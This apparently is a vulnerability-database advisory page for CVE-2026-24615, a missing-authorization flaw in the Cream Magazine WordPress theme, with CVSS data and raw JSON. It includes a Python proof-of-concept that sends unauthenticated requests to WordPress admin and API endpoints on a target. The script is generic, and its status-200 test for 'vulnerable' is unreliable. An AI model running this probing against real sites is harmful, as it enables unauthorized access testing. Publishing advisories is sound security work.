Security Vulnerability Report
中文
CVE-2026-24615 CVSS 5.3 MEDIUM

CVE-2026-24615

Published: 2026-01-23 15:16:20
Last Modified: 2026-04-28 15:16:20

Description

Missing Authorization vulnerability in themebeez Cream Magazine cream-magazine allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Cream Magazine: from n/a through <= 2.1.10.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Cream Magazine (themebeez) <= 2.1.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24615 PoC - Cream Magazine Missing Authorization # This PoC demonstrates accessing protected endpoints without authorization import requests import sys TARGET_URL = "http://target-site.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2026-24615 Missing Authorization in Cream Magazine theme """ # Common Cream Magazine endpoints that might be unprotected vulnerable_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-admin/admin.php?page=cream-magazine-options", "/wp-json/wp/v2/settings" ] print(f"[*] Testing target: {TARGET_URL}") print(f"[*] CVE-2026-24615: Cream Magazine Missing Authorization\n") for endpoint in vulnerable_endpoints: url = f"{TARGET_URL}{endpoint}" print(f"[*] Testing endpoint: {endpoint}") try: # Send request without authentication response = requests.get(url, timeout=10) # Check if we can access the resource without auth if response.status_code == 200: print(f"[+] VULNERABLE: Endpoint {endpoint} accessible without auth") print(f" Status: {response.status_code}") print(f" Response length: {len(response.text)} bytes\n") elif response.status_code == 403: print(f"[-] Protected: Endpoint {endpoint} returned 403 Forbidden\n") else: print(f"[*] Endpoint {endpoint} returned status {response.status_code}\n") except requests.exceptions.RequestException as e: print(f"[!] Error accessing {endpoint}: {e}\n") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24615", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:20.420", "lastModified": "2026-04-28T15:16:19.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in themebeez Cream Magazine cream-magazine allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Cream Magazine: from n/a through <= 2.1.10."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en themebeez Cream Magazine cream-magazine permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Cream Magazine: desde n/a hasta &lt;= 2.1.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/cream-magazine/vulnerability/wordpress-cream-magazine-theme-2-1-10-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}